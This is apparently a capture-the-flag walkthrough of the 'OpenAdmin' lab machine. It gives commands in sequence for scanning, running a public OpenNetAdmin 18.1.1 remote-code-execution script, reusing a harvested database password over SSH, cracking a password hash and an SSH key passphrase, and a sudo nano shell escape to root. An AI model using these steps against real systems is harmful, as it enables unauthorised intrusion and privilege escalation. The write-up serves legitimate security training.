OpenAdmin is an easy difficulty Linux machine that features an outdated OpenNetAdmin CMS instance. The CMS is exploited to gain a foothold, and subsequent enumeration reveals database credentials. These credentials are reused to move laterally to a low privileged user. This user is found to have access to a restricted internal application. Examination of this application reveals credentials that are used to move laterally to a second user. A sudo misconfiguration is then exploited to gain a root shell.
Nmap scan
We start by checking the running services:
nmap -sV -sC 10.10.10.171 -v
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA)
| 256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA)
|_ 256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_ Supported Methods: HEAD GET POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
We have an ssh and a web port open.
http://10.10.10.171 is just returning the default apache web page
Web enumeration
To find the sub-directories , I like to use gobuster
gobuster dir -u http://10.10.10.171 -w /usr/share/wordlists/dirb/common.txt
/artwork (Status: 301)
/index.html (Status: 200)
/music (Status: 301)
/server-status (Status: 403)
After checking the login page at http://10.10.10.171/music , I've found an interesting service version
The version is v18.1.1
By checking the page source:
<head>
<title>OpenNetAdmin :: 0wn Your Network</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<link rel="stylesheet" type="text/css" href="/ona/include/html_style_sheet.inc.php">
<link rel="shortcut icon" type="image/ico" href="/ona/images/favicon.ico">
<script type="text/javascript" src="/ona/include/js/global.js" language="javascript"></script>
<script type="text/javascript" src="/ona/include/xajax_drag/drag.js"></script>
<script type="text/javascript" src="/ona/include/xajax_suggest/suggest.js"></script>
The title is OpenNetAdmin. We can use searchsploit to search for an exploit for the version
searchsploit opennetadmin
OpenNetAdmin 13.03.01 - Remote Code Execution | exploits/php/webapps/26682.txt
OpenNetAdmin 18.1.1 - Command Injection Exploit (Metasploit) | exploits/php/webapps/47772.rb
OpenNetAdmin 18.1.1 - Remote Code Execution
We have an RCE!
First shell
We can grab the exploit:
searchsploit -m exploits/php/webapps/47691.sh && chmod +x 47691.sh
then we execute it against the vulnerable endpoint
./47691.sh http://10.10.10.171/ona/login.php
We have a first shell!
Finding ssh creds
After spending some time searching for a clue, I've decided to take a look at the web root directory /var/www/html/ona/local/config/ and found an interesting php file called database_settings.inc.php which has a password n1nj4W4rri0R!
<?php
$ona_contexts=array (
'DEFAULT' =>
array (
'databases' =>
array (
0 =>
array (
'db_type' => 'mysqli',
'db_host' => 'localhost',
'db_login' => 'ona_sys',
'db_passwd' => 'n1nj4W4rri0R!',
'db_database' => 'ona_default',
'db_debug' => false,
),
),
'description' => 'Default data context',
'context_color' => '#D3DBFF',
),
);
Now we need a valid user. In Linux, we can find the usernames in /home or by checking the /etc/passwd
$ ls /home
jimmy
joanna
I've tried to ssh with both users and the password worked for the jimmy user!
Owning User
By checking the running services using netstat -antp ,we can see few services running locally
To be able to access them, we have to do a port forwarding , the easiest way here is using ssh.
ssh -L 52846:localhost:52846 [email protected]
First , I've tried curl http://127.0.0.1:52846 and seemed to be a login page. We can access it from the browser to see the actual page.
At this point , we can check the DocumentRoot for this page, maybe we can find login creds in the files.
To do so, we need to check the apache config files
ls -l /etc/apache2/sites-available/
total 16
-rw-r--r-- 1 root root 6338 Jul 16 2019 default-ssl.conf
-rw-r--r-- 1 root root 303 Nov 23 17:13 internal.conf
-rw-r--r-- 1 root root 1329 Nov 22 14:24 openadmin.conf
The openadmin.conf is for the default apache web root,but internal.conf has:
Listen 127.0.0.1:52846
<VirtualHost 127.0.0.1:52846>
ServerName internal.openadmin.htb
DocumentRoot /var/www/internal
<IfModule mpm_itk_module>
AssignUserID joanna joanna
</IfModule>
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
The index.php in the /var/www/internal dir has a password:
if ($_POST['username'] == 'jimmy' && hash('sha512',$_POST['password']) == '00e302ccdcf1c60b8ad50ea50cf72b939705f49f40f0dc658801b4680b7d758eebdc2e9f9ba8ba3ef8a8bb9a796d34ba2e856838ee9bdde852b8ec3b3a0523b1') {
Cracking this password with crackstation : https://crackstation.net/ gives me Revealed as password.
A private id_rsa key appears after web login. We can crack it with john. Save the id rsa in a file called id_rsa then convert it to john format:
/opt/sshng2john.py id_rsa > to_crack
john to_crack -w=/usr/share/wordlists/rockyou.txt
The password is bloodninjas
Now we can ssh using joanna with this id_rsa and the cracked password
Owning root
First thing to do is to check if we can run commands as root without password
sudo -l
joanna@openadmin:~$ sudo -l
Matching Defaults entries for joanna on openadmin:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User joanna may run the following commands on openadmin:
(ALL) NOPASSWD: /bin/nano /opt/priv
We can run /bin/nano /opt/priv as all users without password.
Gtfobins nano: https://gtfobins.github.io/gtfobins/nano/
Commands:
sudo -u root /bin/nano /opt/priv
press: ctrl+R ctrl+X then type: reset; sh 1>&0 2>&0 and press enter
Box owned! Your feedback is appreciated :)